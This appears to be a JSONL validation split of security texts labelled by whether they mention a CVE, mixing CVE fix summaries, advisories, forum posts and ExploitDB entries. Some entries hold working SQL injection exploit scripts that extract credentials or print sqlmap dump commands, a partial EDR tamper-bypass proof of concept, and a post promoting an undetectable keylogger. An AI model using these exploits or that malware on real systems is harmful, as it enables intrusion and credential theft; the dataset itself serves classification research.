+{"id": "4b31a2206c9fd1bbc548", "text": "CVE: CVE-2022-2284\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0017: accessing memory beyond the end of the line\n\nProblem: Accessing memory beyond the end of the line.\nSolution: Stop Visual mode when closing a window.", "source": "cvefixes", "timestamp": "2022-07-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "6c29b50cf52d481e0b8f", "text": "CVE: CVE-2022-0243\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in NuGet OrchardCore.Application.Cms.Targets prior to 1.2.2.'}]\n\nFix commit: Fix localization and sanitization usages (#11034)", "source": "cvefixes", "timestamp": "2022-01-19", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c9c7737ab99bf0a459bc", "text": "Hi Wathix, Can you help with this please? I’ve been stuck on this assessment for a week now. I would greatly appreciate it.", "source": "hackthebox", "timestamp": "2023-04-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "893dbfcc3c6bfb922589", "text": "RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution\n\n# Exploit Title: RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution\n[+] Credits: John Page (aka hyp3rlinx)\n[+] Website: hyp3rlinx.altervista.org\n[+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt\n[+] twitter.com/hyp3rlinx\n[+] ISR: ApparitionSec\n\n[Vendor]\nRSA Security\nwww.netwitness.com\n\n\n[Product]\nNetWitness Endpoint EDR Agent\n\nThe RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility\ninto their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly\ndetecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response.\n\n\n[Vulnerability Type]\nIncorrect Access Control / Code Execution\n\n\n[CVE Reference]\nCVE-2022-47529\n\n\n[Security Issue]\nCVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands.\n\nInsecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local\nand admin Windows user accounts to modify the endpoint agent service configuration:\nto either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification.\n\nInterestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report.\n\nSHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d\nLANDeskService.exe\n\n\n[Severity]\nCritical\n\n\n[Impact(s)]\nDenial-of-Service\nArbitrary Code Execution\n\n\n[Attack Vector]\nTo exploit, open handle to memory objects held by the endpoint agent,\nmodify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group\n\n\n[Affected Product Code Base]\nAll versions prior to v12.2\n\n\n[Network Access]\nLocal\n\n\n[References]\nhttps://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935\n\n\n[Vuln Code Block]:\n00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p\n.text:00000001400F7B10 ; sub_14013BA50+19?p\n.text:00000001400F7B10 ; DATA XREF: ...\n.text:00000001400F7B10 push rbx\n.text:00000001400F7B12 sub rsp, 20h\n.text:00000001400F7B16 mov rbx, rcx\n.text:00000001400F7B19 test rcx, rcx\n.text:00000001400F7B1C jz short loc_1400F7B5C\n.text:00000001400F7B1E call cs:InitializeCriticalSection\n.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection\n.text:00000001400F7B28 call cs:InitializeCriticalSection\n.text:00000001400F7B2E mov edx, 1 ; bManualReset\n.text:00000001400F7B33 xor r9d, r9d ; lpName\n.text:00000001400F7B36 mov r8d, edx ; bInitialState\n.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes\n.text:00000001400F7B3B call cs:CreateEventW\n.text:00000001400F7B41 mov [rbx+50h], rax\n.text:00000001400F7B45 mov dword ptr [rbx+58h], 0\n.text:00000001400F7B4C test rax, rax\n.text:00000001400F7B4F jz short loc_1400F7B5C\n\n\n\n[Exploit/POC]\n\"RSA_NetWitness_Exploit.c\"\n\n#include \"windows.h\"\n#include \"stdio.h\"\n#include \"accctrl.h\"\n#include \"aclapi.h\"\n\n#define OPEN_ALL_ACCESS 0x1F0003\n\n/*\nRSA NetWitness EDR Endpoint Agent\nTamper Protection Bypass / EoP Code Execution\nRSA NetWitness.msi --> NWEAgent.exe\nMD5: c0aa7e52cbf7799161bac9ebefa38d49\n\nExpected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent.\nAc", "source": "exploitdb", "timestamp": "2023-04-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "07d7210efd01c67d3555", "text": "CVE: CVE-2022-1808\n\n[{'lang': 'en', 'value': 'Execution with Unnecessary Privileges in GitHub repository polonel/trudesk prior to 1.2.3.'}]\n\nFix commit: fix(core): verify user exists", "source": "cvefixes", "timestamp": "2022-05-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "724f72ef775f77add3c9", "text": "WebTareas 2.4 - Blind SQLi (Authenticated)\n\n# Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated)\n# Date: 04/20/2022\n# Exploit Author: Behrad Taher\n# Vendor Homepage: https://sourceforge.net/projects/webtareas/\n# Version: < 2.4p3\n# CVE : CVE-2021-43481\n\n#The script takes 3 arguments: IP, user ID, session ID\n#Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i\n\nimport requests, time, sys\nfrom bs4 import BeautifulSoup\nip = sys.argv[1]\nid = sys.argv[2]\nsid = sys.argv[3]\n\ndef sqli(column):\n print(\"Extracting %s from user with ID: %s\\n\" % (column,id))\n extract = \"\"\n for i in range (1,33):\n #This conditional statement will account for variable length usernames\n if(len(extract) < i-1):\n break\n for j in range(32,127):\n injection = \"SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);\" % (column,i,j)\n url = \"http://%s/approvals/editapprovaltemplate.php?id=1\" % ip\n GET_cookies = {\"webTareasSID\": \"%s\" % sid}\n r = requests.get(url, cookies=GET_cookies)\n #Because the app has CSRF protection enabled we need to send a get request each time and parse out the CSRF Token\"\n token = BeautifulSoup(r.text,features=\"html.parser\").find('input', {'name':'csrfToken'})['value']\n #Because this is an authenticated vulnerability we need to provide a valid session token\n POST_cookies = {\"webTareasSID\": \"%s\" % sid}\n POST_data = {\"csrfToken\": \"%s\" % token, \"action\": \"update\", \"cd\": \"Q\", \"uq\": \"%s\" % injection}\n start = time.time()\n requests.post(url, cookies=POST_cookies, data=POST_data)\n end = time.time() - start\n if end > 5:\n extract += chr(j)\n print (\"\\033[A\\033[A\")\n print(extract)\n break\n#Modularized the script for login and password values\nsqli(\"login\")\nsqli(\"password\")", "source": "exploitdb", "timestamp": "2022-05-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "3b9f4177655ef562b0b5", "text": "[Unknown] [CVE-2023-27539] Possible Denial of Service Vulnerability in Rack’s header parsing\n\nI made a report and patch at https://hackerone.com/reports/1887373 .\n\nhttps://discuss.rubyonrails.org/t/cve-2023-27539-possible-denial-of-service-vulnerability-in-racks-header-parsing/82466\n\n> There is a denial of service vulnerability in the header parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2023-27539.\n\n## Impact\n\n> Carefully crafted input can cause header parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. Any applications that parse headers using Rack (virtually all Rails applications) are impacted.", "source": "hackerone", "timestamp": "2023-08-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "d873e2bd722dc47b6b00", "text": "CVE: CVE-2022-23572\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. Under certain scenarios, TensorFlow can fail to specialize a type during shape inference. This case is covered by the `DCHECK` function however, `DCHECK` is a no-op in production builds and an assertion failure in debug builds. In the first case execution proceeds to the `ValueOrDie` line. This results in an assertion failure as `ret` contains an error `Status`, not a value. In the second case we also get a crash due to the assertion failure. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, and TensorFlow 2.6.3, as these are also affected and still in supported range.'}]\n\nFix commit: Properly handle the case where `SpecializeType()` returns an error `Status`.\n\nIf the error case in `SpecializeType()` is reached, then we would get a crash when trying to access the value of an errorenous `StatusOr` object\n\nPiperOrigin-RevId: 408380069\nChange-Id: If3c3fc876dcf9384d5ec7a4985adc68c23ea7318", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "5ae074b93debd9c62101", "text": "CVE: CVE-2022-23080\n\n[{'lang': 'en', 'value': 'In directus versions v9.0.0-beta.2 through 9.6.0 are vulnerable to server-side request forgery (SSRF) in the media upload functionality which allows a low privileged user to perform internal network port scans.'}]\n\nFix commit: Add support for import ip deny list (#12025)\n\n* Add support for import ip deny list\r\n\r\n* Fix typo", "source": "cvefixes", "timestamp": "2022-06-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ee5a2d9affe7a593d0ab", "text": "CVE: CVE-2022-29530\n\n[{'lang': 'en', 'value': 'An issue was discovered in MISP before 2.4.158. There is stored XSS in the galaxy clusters.'}]\n\nFix commit: fix: [security] XSS in galaxy clusters\n\n- fixed a stored XSS in the galaxy clusters\n\n- as reported by Dawid Czarnecki of Zigrin Security on behalf of the Luxembourg Army", "source": "cvefixes", "timestamp": "2022-04-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b9d84bad1a6ff6d7c781", "text": "Now that anti virus scanners respond quickly to every newly created backdoor, you need to be creative and go through the back door. Here’s an example of how discord is used to access someone else’s computer: GitHub - 3ct0s/discord-keylogger: Undetectable Keylogger that reports to Discord", "source": "hackersploit", "timestamp": "2022-02-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "8ba9b2b0179f6acd3315", "text": "CVE: CVE-2022-31155\n\n[{'lang': 'en', 'value': 'Sourcegraph is an opensource code search and navigation engine. In Sourcegraph versions before 3.41.0, it is possible for an attacker to delete other users’ saved searches due to a bug in the authorization check. The vulnerability does not allow the reading of other users’ saved searches, only overwriting them with attacker-controlled searches. The issue is patched in Sourcegraph version 3.41.0. There is no workaround for this issue and updating to a secure version is highly recommended.'}]\n\nFix commit: Saved searches: fix update permissions (#36674)", "source": "cvefixes", "timestamp": "2022-08-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "77a60a238902c7165ce4", "text": "Recruitment for battlegrounds and overall CTF competitions (on and off platform)\n\ngreetings hack fam! Ive seen other posts regarding teams and recruitment, figured I’d giveit a try. I started a new team \" strataGEM\" . I would like to use the platform and the team set up to build a small group of enthusiasts that will target certain machines upon release as a team in an organized effort. Battlegrounds as well. I would love to be able to be a part of a team that live chats as we hack and attack boxes with assigned roles according to our strengths and weaknesses. I do not care about current skill level for the most part however if you find yourself wanting to ask… “whats the first step to becoming a hacker” … keep learning my friend, the journey itself is a beautiful thing. More than anything I would like to create a safe competitive space for like minded enthusiasts and make some alliances in the hacking world. Hope to hear from some of you! If there is a team that functions in the way that I havae described and would like to possibly take on a new member id be down for that as well.", "source": "hackthebox", "timestamp": "2022-01-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0106b88f929f6d55a541", "text": "debian - How to show the number of installed packages - Unix & Linux Stack Exchange this should help", "source": "hackthebox", "timestamp": "2022-03-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a92b6daed02de98ec1ce", "text": "Possible shell escape sequence injection vulnerability in Rack\n\n[Severity: CRITICAL]\n\nThere is a possible shell escape sequence injection vulnerability in the Lint\nand CommonLogger components of Rack. This vulnerability has been assigned the\nCVE identifier CVE-2022-30123.\n\nVersions Affected: All.\nNot affected: None\nFixed Versions: 2.0.9.1, 2.1.4.1, 2.2.3.1\n\n## Impact\nCarefully crafted requests can cause shell escape sequences to be written to\nthe terminal via Rack's Lint middleware and CommonLogger middleware. These\nescape sequences can be leveraged to possibly execute commands in the victim's\nterminal.\n\nImpacted applications will have either of these middleware installed, and\nvulnerable apps may have something like this:\n\n```\nuse Rack::Lint\n```\n\nOr\n\n```\nuse Rack::CommonLogger\n```\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\n## Workarounds\nRemove these middleware from your application\n", "source": "github_advisory", "timestamp": "2022-05-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "62b92db4a3a3bfbfb120", "text": "Mitmproxy hacking plugin\n\nI stop using burp long time a go because it is closed source, then zap lately because I just can’t stand java, so I found for what I need (just a HTTP interceptor that I can modify information and pause/release) mitmproxy to be the perfect tool and very hackable and open source. So started to write a plugin to start using other tools inside it like gobuster, nikto, grab links and comments etc… Here is the pluging and here is the main site. I will be adding more features as I go, feel free to submit patches. Happy Hacking", "source": "hackthebox", "timestamp": "2023-11-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4674ea6eb38899bb353b", "text": "Can somone help me with “What filter will allow me to see traffic coming from or destined to the host with an ip of 10.10.20.1” i tried every possible answer i could think of Q1 Tcpdump packet filtering", "source": "hackthebox", "timestamp": "2022-08-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1a43cbbf589a84d9252e", "text": "I finally solved! and after reading the forum posts, some of them may lead to confusion. You don’t need to do any transformation to the result of the register, it is the value that has to be. It is not necessary to use any function to write the values on the screen, in fact, the printf function can lead you to confusion with its results. Debug, and debug again, what is the value of the rdx register before the xor? and after? is there something wrong with any of the values?", "source": "hackthebox", "timestamp": "2022-11-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e58bf9c20c3e0b77e2b8", "text": "I’ve solved most of JET but am stuck on Elasticity, anyone know how to fix it? You can also DM me if you have problems with the previous flags", "source": "hackthebox", "timestamp": "2023-04-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4a8147387248a006e321", "text": "CVE: CVE-2022-31019\n\n[{'lang': 'en', 'value': 'Vapor is a server-side Swift HTTP web framework. When using automatic content decoding an attacker can craft a request body that can make the server crash with the following request: `curl -d \"array[_0][0][array][_0][0][array]$(for f in $(seq 1100); do echo -n \\'[_0][0][array]\\'; done)[string][_0]=hello%20world\" http://localhost:8080/foo`. The issue is unbounded, attacker controlled stack growth which will at some point lead to a stack overflow and a process crash. This issue has been fixed in version 4.61.1.'}]\n\nFix commit: Merge pull request from GHSA-qvxg-wjxc-r4gg\n\n* Add test for crash\n\n* The sensible option\n\n* Crude fix\n\n* Throw an error if we hit a nesting limit\n\n* Catch error in test", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "4f450a803a167d7e677e", "text": "Yes for sure it’s amazing tools with metasploit. Tested x86/shikata_ga_nai but it’s still not FUD. Maybe you can write name on the encoder which will do the job", "source": "parrotsec", "timestamp": "2022-01-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "fda5f687db6fadfba6cd", "text": "CVE: CVE-2022-0729\n\n[{'lang': 'en', 'value': 'Use of Out-of-range Pointer Offset in GitHub repository vim/vim prior to 8.2.4440.'}]\n\nFix commit: patch 8.2.4440: crash with specific regexp pattern and string\n\nProblem: Crash with specific regexp pattern and string.\nSolution: Stop at the start of the string.", "source": "cvefixes", "timestamp": "2022-02-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c20fd0fec57f8fa88dcb", "text": "how to pentest a CISCO ISR 4331 with routersploit, or any other tool\n\nHey there I’m trying to pentest a CISCO ISR 4331 using routersploit. But this model of router is not on the list of routers routersploit has available to exploit. when I try running routersploit running the autopwn on this router I just get the following results. All creds and routers “not vulnerable” except these ones below. “IP” Could not verify exploitability : http exploits/routers/asus/asuwart_lan_rce http exploits/routers/shuttle/915wm_dns_change http exploits/routers/netgear/dgn2200-dnslookup_cgi_rce custom/tcp exploits/routers/cisco/catalyst_2960_rocem http exploits/routers/cisco/secure_acs_bypass http exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change http exploits/routers/dlink/dsl_2640b_dns_change http exploits/routers/dlink/dsl_2740r_dns_change custom/udp exploits/routers/dlink/dir_815_850l_rce http exploits/routers/billion/billion_5200w_rce http exploits/routers/3com/officeconnect_rce I’m having trouble finding YouTube video or manual that explain how to properly investigate these links that cannot be verified. I also get mixed signals from these links even they they are not the same models as my router. After exploring all the options while writing this question Im pretty sure none if them can be used to pen test a CISCO 4331 ISR so any links or advice on how i can do this with routersploit or any other program would be appreciated.", "source": "hackersploit", "timestamp": "2022-10-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "458c3919ba715231ad61", "text": "CVE: CVE-2022-0838\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.5.10.'}]\n\nFix commit: replace html() with text\n\n+ 2 small problems on add / edit database page", "source": "cvefixes", "timestamp": "2022-03-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "569014f70baa0938f576", "text": "Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n\n#!/usr/bin/env python\n# Exploit Title: Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n# Exploit Author: r3nt0n\n# CVE: CVE-2023-23488\n# Date: 2023/01/24\n# Vulnerability discovered by Joshua Martinelle\n# Vendor Homepage: https://www.paidmembershipspro.com\n# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip\n# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9\n# Version: < 2.9.8\n# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7\n#\n# Running this script against a WordPress instance with Paid Membership Pro plugin\n# tells you if the target is vulnerable.\n# As the SQL injection technique required to exploit it is Time-based blind, instead of\n# trying to directly exploit the vuln, it will generate the appropriate sqlmap command\n# to dump the whole database (probably very time-consuming) or specific chose data like\n# usernames and passwords.\n#\n# Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress\n\nimport sys\nimport requests\n\ndef get_request(target_url, delay=\"1\"):\n payload = \"a' OR (SELECT 1 FROM (SELECT(SLEEP(\" + delay + \")))a)-- -\"\n data = {'rest_route': '/pmpro/v1/order',\n 'code': payload}\n return requests.get(target_url, params=data).elapsed.total_seconds()\n\nprint('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\\n')\nif len(sys.argv) != 2:\n print('Usage: {} '.format(\"python3 CVE-2023-23488.py\"))\n print('Example: {} http://127.0.0.1/wordpress'.format(\"python3 CVE-2023-23488.py\"))\n sys.exit(1)\n\ntarget_url = sys.argv[1]\ntry:\n print('[-] Testing if the target is vulnerable...')\n req = requests.get(target_url, timeout=15)\nexcept:\n print('{}[!] ERROR: Target is unreachable{}'.format(u'\\033[91m',u'\\033[0m'))\n sys.exit(2)\n\nif get_request(target_url, \"1\") >= get_request(target_url, \"2\"):\n print('{}[!] The target does not seem vulnerable{}'.format(u'\\033[91m',u'\\033[0m'))\n sys.exit(3)\nprint('\\n{}[*] The target is vulnerable{}'.format(u'\\033[92m', u'\\033[0m'))\nprint('\\n[+] You can dump the whole WordPress database with:')\nprint('sqlmap -u \"{}/?rest_route=/pmpro/v1/order&code=a\" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url))\nprint('\\n[+] To dump data from specific tables:')\nprint('sqlmap -u \"{}/?rest_route=/pmpro/v1/order&code=a\" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url))\nprint('\\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):')\nprint('sqlmap -u \"{}/?rest_route=/pmpro/v1/order&code=a\" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url))\nsys.exit(0)", "source": "exploitdb", "timestamp": "2023-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "7df81826e6a1240ccd0b", "text": "Symfony Arbitrary PHP code Execution\n\n[Severity: HIGH]\n\nSymfony 2.0.x before 2.0.22, 2.1.x before 2.1.7, and 2.2.x remote attackers to execute arbitrary PHP code via a serialized PHP object to the (1) Yaml::parse or (2) Yaml\\Parser::parse function, a different vulnerability than CVE-2013-1348.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "53b91b44a9cd6a77a4eb", "text": "Yes please if you don’t mind helping. I’ve tried probably a hundred different things with this being the most recent:", "source": "hackthebox", "timestamp": "2023-04-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b629986474cb294499d0", "text": "Making WIFI Hacking Great again, stimulating the WIFI-Hacking Community 2022\n\nI have enjoyed the concept of Wifi Hacking but it seems we have hit a wall. I’m gonna be honest and and say, methods and tutorials for WPS Pixie Attacks, Airgeddon, Wifite, Aircrack, Dictionary attacks through hashing even has become pretty over saturated over time and has led to little to no success. Due to this issue below I will put my thoughts on the current attacks/methods I more or less understand with an additional comment to think about to make better posts for the future so it does not become clutter over time and then something on Frag Attacks in regards to Wifi-Hacking which has caught my eye. PS: The comments are aimed toward obtaining Wifi Passwords. I understand pretty much all the tools mentioned do their job and do it well. Its about the “Passwords” part of Wifi-Hacking that seems a bit empty and stagnate lately, In My Opinion. Dictionary attacks - Takes too long even if hashed. What kind of recon would one have to do to help a dictionary attack be better prepared to Bruteforce. WPS attacks - Besides bashing on the fact that with every 6-12 months WPS attack success feels like it will hit 0% eventually excluding demo tests, You can have a Network say WPS enabled but if it’s not configured how would you know? How do you properly fine tune your wps pin attacks so you don’t get timed out as much or worse locked out or strategies around it. (While technically this information is out they don’t make it easy to understand and it’s the same as nothing.) Not mentioning fixing glitches or maybe legit reasons why common wps cracking scripts are always stuck on 1 pin testing it over and over. Evil Twin Attack - Cool and all until you realize that the “victim” has to go through a login page and convince them which even them which is literally only for clues… it’s especially difficult that even if they log a possible password or… a kind of credentials not having internet makes it suspicious but there’s a way around that. ARP Poisoning Relay attack - Nearly the same results as the Evil Twin attack but, This is easily detectable on certain networks and you could get flagged/blocked. Man In The Middle Attack ^ Krack Attack - nearly the same thing… ARP related, but Relaying a network without the SSL Strip in URL. -This is not really for Wifi passwords though Mac changer - Usually used only for Wifi with Login pages, Paid wifi… and things of that nature but slap in some regular WEP/WPA/WPA2/WPA3 password and Poof method is terrible. -Although… there is some theoretical usage of Authentication with this on regular WIFI networks but I have not seen any solid documentation yet. Now for something I would like to see on user posted experiments and tutorial steps for achieved results and how to stay anonymous also while performing such attacks as always with every attack (Usually people do not make their tutorials intertwined with those critical steps for the real world.) Frag Attacks: What Are Wi-Fi Frag Attacks and How Can You Protect Against Them? Short for “fragmentation” and “aggregation”, Frag attacks allow hackers to bypass firewalls to inject code into Wi-Fi traffic. A new set of vulnerabilities known as Frag attacks have been discovered in Wi-Fi-enabled devices. A website that rather you clicking on my link I rather just search the necessary keywords on your favorite web browser to get to the same place to reduce risk in general for you as a user. https://www.fragattacks.com/ This website has a ton of documentation of this kind of attack and recently I got an understanding on the attack. Even though this is a great source and Youtube has 2-3 videos on this attack by the same person, It’s more of a demo where not everything is explained in the best way possible. Simply because it’s a demo, not a tutorial. This is their github: GitHub - vanhoefm/fragattacks -same warning in regards to the link above… I attempted to “install” everything I needed but it may be the high level vocabulary of Linux related devices and interfaces and directories and… d", "source": "hackersploit", "timestamp": "2022-06-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ae6009aa14d6d6247726", "text": "Grafana <=6.2.4 - HTML Injection\n\n# Exploit Title: Grafana <=6.2.4 - HTML Injection\n# Date: 30-06-2019\n# Exploit Author: SimranJeet Singh\n# Vendor Homepage: https://grafana.com/\n# Software Link: https://grafana.com/grafana/download/6.2.4\n# Version: 6.2.4\n# CVE : CVE-2019-13068\n\nThe uri \"public/app/features/panel/panel_ctrl.ts\" in Grafana before 6.2.5 allows HTML Injection in panel drilldown links (via the Title or url field)\n\nPayload used - Hello ", "source": "exploitdb", "timestamp": "2023-03-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "386a7346942c0b5a8df4", "text": " Installing and working with hcxdumptool\n\nIt is easy to understand I am a newbie, so please I need you to understand. First I am trying to get how the installation process of this tool must be done. Linux Parrot 6.1.0 Parrot 5.3 Security Edition Hi I was following specific indications to install hxcdumptool but there are some differences. There is a version installed by default on ParrotOS which is the 6.0.2-1+b1 but if I run the command line the program does not catch anything Ok first it is recommended to clone as described: GitHub GitHub - ZerBea/hcxdumptool: Small tool to capture packets from wlan devices. Small tool to capture packets from wlan devices. Contribute to ZerBea/hcxdumptool development by creating an account on GitHub. git clone https://github.com/ZerBea/hcxdumptool.git cd hcxdumptool make The installation is done with no problems but when I enter the command *sudo hcxdumptool -i wlxxx -o dumpfile pcapng -active_beacon-enable_status=15 it shows the message hcxdumptool: invalid option --o Ive done it before with the same laptop but I had a problem and I don't remember what was the procedure I followed to do the installation, I think the problem is with the hcxtools package, if I look in the Synaptic Package Manager it shows me the hcxtools version 6.0.2-1+b1 and what I need is a more recent one. By the way the hcxdumptools I installed is the 6.3.2-1. The hcxdumptool and the hcxtools showed in the Synaptic Manager are not installed. If you can help me to find the right procedure to install this tool, thank you.", "source": "parrotsec", "timestamp": "2023-11-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f5d3b1cfd24095ddd3d2", "text": "CVE: CVE-2022-34927\n\n[{'lang': 'en', 'value': 'MilkyTracker v1.03.00 was discovered to contain a stack overflow via the component LoaderXM::load. This vulnerability is triggered when the program is supplied a crafted XM module file.'}]\n\nFix commit: Fix possible stack corruption with XM instrument headers claiming a size of less than 4\n\nCloses #275", "source": "cvefixes", "timestamp": "2022-08-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "cc88250b20bf93635fe3", "text": "CVE: CVE-2022-1815\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2.'}]\n\nFix commit: 18.1.2 release", "source": "cvefixes", "timestamp": "2022-05-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "eb0d8904e764d10bcf96", "text": "Analytical problems\n\nhi guys! the machine “Analytical” always redirects to the link: https://html.design I think it’s not the direction of the training machine, correct me if I’m wrong… i hope you can help me", "source": "hackthebox", "timestamp": "2023-12-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "a12d66d78571561fea54", "text": "Nokogiri updates packaged libxml2 to v2.10.4 to resolve multiple CVEs\n\n[Severity: MEDIUM]\n\n### Summary\n\nNokogiri v1.14.3 upgrades the packaged version of its dependency libxml2 to [v2.10.4](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.10.4) from v2.10.3.\n\nlibxml2 v2.10.4 addresses the following known vulnerabilities:\n\n- [CVE-2023-29469](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29469): Hashing of empty dict strings isn't deterministic\n- [CVE-2023-28484](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28484): Fix null deref in xmlSchemaFixupComplexType\n- Schemas: Fix null-pointer-deref in xmlSchemaCheckCOSSTDerivedOK\n\nPlease note that this advisory only applies to the CRuby implementation of Nokogiri `< 1.14.3`, and only if the _packaged_ libraries are being used. If you've overridden defaults at installation time to use _system_ libraries instead of packaged libraries, you should instead pay attention to your distro's `libxml2` release announcements.\n\n\n### Mitigation\n\nUpgrade to Nokogiri `>= 1.14.3`.\n\nUsers who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile and link Nokogiri against external libraries libxml2 `>= 2.10.4` which will also address these same issues.\n\n\n### Impact\n\nNo public information has yet been published about the security-related issues other than the upstream commits. Examination of those changesets indicate that the more serious issues relate to libxml2 dereferencing NULL pointers and potentially segfaulting while parsing untrusted inputs.\n\nThe commits can be examined at:\n\n- [[CVE-2023-29469] Hashing of empty dict strings isn't deterministic (09a2dd45) · Commits · GNOME / libxml2 · GitLab](https://gitlab.gnome.org/GNOME/libxml2/-/commit/09a2dd453007f9c7205274623acdd73747c22d64)\n- [[CVE-2023-28484] Fix null deref in xmlSchemaFixupComplexType (647e072e) · Commits · GNOME / libxml2 · GitLab](https://gitlab.gnome.org/GNOME/libxml2/-/commit/647e072ea0a2f12687fa05c172f4c4713fdb0c4f)\n- [schemas: Fix null-pointer-deref in xmlSchemaCheckCOSSTDerivedOK (4c6922f7) · Commits · GNOME / libxml2 · GitLab](https://gitlab.gnome.org/GNOME/libxml2/-/commit/4c6922f763ad958c48ff66f82823ae21f2e92ee6)\n", "source": "github_advisory", "timestamp": "2023-04-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
